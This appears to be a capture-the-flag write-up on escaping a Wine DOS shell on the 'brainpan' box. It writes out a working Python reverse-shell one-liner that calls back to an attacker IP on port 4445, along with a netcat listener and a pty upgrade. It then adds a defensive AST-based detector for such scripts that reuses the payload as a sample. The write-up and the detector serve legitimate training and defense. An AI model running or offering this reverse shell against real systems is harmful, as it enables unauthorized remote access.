Escape Wine Shell

Privilege Escalation

Now we need to get out of this garbage wine shell. We have a DOS prompt, which can’t do much, so we will need to live off the land. If we issue the “dir” command, we see the script responsible for restarting the brainpan server. We can issue “type checksrv.sh” to view its contents and see that it’s running a python command, with python located at /usr/bin/python. We can use that binary to spawn a real Linux shell.

We create a python file via DOS that, when run, will spawn a reverse shell to port 4445, and call it “shell1.py”:

echo import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.44.149",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); > shell1.py

Now we run it with python while we listen on our host on port 4445 via netcat (nc -lvp 4445):

/usr/bin/python shell1.py

Now we have a limited shell, which we can upgrade with:

python -c 'import pty; pty.spawn("/bin/bash")'
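
From the defender's side, shell1.py has a recognizable shape: an outbound connect, the socket duplicated onto file descriptors 0-2, and a shell spawned. The following is an added example, not part of the original write-up: a static check for that combination in dropped .py files. The function names and the sample address 192.0.2.10 are assumptions made for illustration.

```python
import ast

SHELLS = {"/bin/sh", "/bin/bash", "sh", "bash"}
SPAWNERS = {"pty.spawn", "subprocess.call", "subprocess.Popen", "os.system"}

def dotted(node):
    """Return 'a.b' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    return ".".join(reversed(parts + [node.id]))

def indicators(source):
    """Collect reverse-shell indicators from Python source without running it."""
    found = set()
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return found  # not parseable as Python 3; a real scanner would log this
    for call in (n for n in ast.walk(tree) if isinstance(n, ast.Call)):
        name = dotted(call.func)
        if name.endswith(".connect"):
            found.add("outbound-connect")
        elif name == "os.dup2" and len(call.args) == 2:
            fd = call.args[1]
            if isinstance(fd, ast.Constant) and fd.value in (0, 1, 2):
                found.add("stdio-redirect")
        elif name in SPAWNERS:
            strs = {c.value for c in ast.walk(call)
                    if isinstance(c, ast.Constant) and isinstance(c.value, str)}
            if strs & SHELLS:
                found.add("shell-spawn")
    return found

def is_reverse_shell(source):
    return {"outbound-connect", "stdio-redirect", "shell-spawn"} <= indicators(source)

# Constructed samples; 192.0.2.10 is a documentation address.
DROPPED = ('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
           's.connect(("192.0.2.10",4445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
           'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')
PTY_UPGRADE = 'import pty; pty.spawn("/bin/bash")'
BENIGN = 'import socket\ns = socket.socket()\ns.connect(("192.0.2.10", 443))\ns.close()'

if __name__ == "__main__":
    for label, src in [("dropped", DROPPED), ("pty", PTY_UPGRADE), ("benign", BENIGN)]:
        print(label, sorted(indicators(src)), is_reverse_shell(src))
```

This is a triage heuristic: it only sees literal call names and constants, so it belongs alongside process and network telemetry rather than in place of it.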
